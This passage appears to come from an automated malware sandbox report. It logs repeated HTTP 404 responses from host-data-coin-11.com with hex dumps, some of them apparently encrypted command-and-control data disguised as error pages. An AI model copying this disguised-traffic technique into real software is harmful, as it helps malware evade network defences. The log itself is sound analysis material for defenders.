Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 df 41 d7 f7 22 82 23 e9 af 9a 56 29 e6 b7 4f 29 e3 b3 b7 6d f4 9d ba 5f a9 74 92 ca 31 46 5a 3c 02 49 d3 bb 55 ab e9 5d 8f ad d6 05 c0 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XPA"#V)O)m_t1FZ<IU]`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 ae 8a 70 bc 57 dd 42 df f9 23 8d 21 ef c3 96 52 29 e0 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpWB#!R)c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 43 fc 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OU?ACSvDg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%-0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 59 8c 3a f8 0e 69 c0 31 c3 db 66 f1 64 50 06 b9 bc 8e 16 a3 1b 80 02 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OTeY:i1fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 4e 08 79 06 be aa 85 bc a1 5e b1 44 ca 7a a6 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 25I:82ONy^DzU0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 